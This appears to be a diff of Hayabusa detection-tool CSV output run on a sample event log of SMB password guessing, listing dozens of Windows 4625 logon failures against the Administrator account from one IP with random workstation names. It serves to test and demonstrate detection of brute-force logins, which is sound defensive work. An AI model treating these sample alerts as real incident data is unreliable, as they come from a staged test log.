+2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IyV8stIvfXLJQpsn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uStfvm0y0eZrWONH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUwTyUXe8NLG7bCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HQuDp8aZpWDANKMe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GQKTlzx2gq9ayAtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tCzVponBvb9mbyIr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mSwnrFv90KjN2cqj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QX5TLs2MPkia1cmk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ammLKlG1Q5awQGvN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJ1ijJjPJbF4uFlo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZOLnwIzpGz03Yjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xS8U3UQNz6l0LZn0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: no6cftQ5MF1fjZ0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5WHS6jVRnCUH0Rb5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i3oGLwrCJXJOauf6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1sxPrDYV3rr4pGJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Osysh2O2A3A2bN22  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FsInW9EMJZU8FOrF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ge8do8TM4GG1atMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4w5GLbpVsAhGqCiq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8eQXeW1VpRU0ptMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhLosoA2parzTnW9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MCFTP4gVGEKFKuRI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ALrDwJz2cta9fcXB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZZNXGw28osMQLjub  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4wQzvMnwYuEQRO7V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UloOAIgGuj6NecfR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cVSeLo2PRgGmf83Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SaCFO8CPFLuERugV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCwV1D4L5BDZSriK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QPhLQsM4R2ua4SxW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fwgp52JNi7xnTxpN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2GutBDenjweAluz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wflcgg5ebqu8hHGL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jXaaYSU2pakw6IsK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfJnBv3eA8wZttML  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kOXSI0jPfbvW4dAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8JW6aX5mNz7cETsl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NVuJLXJzlVnDLT4Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtSwhwnApnPI9AkO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1peOkjbd1WXGEAAM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Tbw3V9MtLIcxr65R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CEZ2v1f6t0luDj4D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R0omMppAFlFhE1mG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0jMvVN9eSeGW3zcN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnFNYabbO7IpbVku  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8KtyTTNdqVikZGYY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DCChjnFv2hMXXwgW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FvIYRZSomaJYJOH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FEirUFRscaOwTuAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RwQgMM9H1oN4te9Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JbGILYTcFwtYbDk1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5KzNsgWvyUhNEHd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KGvwbOtP3A5eDKCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YZvtNNX511hIleST  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lJBRTeW6OQtNrt5u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hovgq99STVt2GzrO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4kpT3gf0VCAVuVSa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tiB04AvkYp0PP3n1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PPluKgaiT10oC35V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8nCOM9uUeqv9QBx6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dSPrrNCh2FSWZKbI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aLDnCjr4pSdKAMX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G0UnmfB7lcXKEAvn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogjMSxcUw7cF5dMa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75uB8ejsSV5CbagM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5MMHLnyrzBQxluHn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5QXLn6fpmR52RBAz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KcdlrSUzcFNpaK5v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJjiRO5rJzZ8XtqP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ncBraDdG2htkHjXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lo9DNrL44Z2S2SYR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
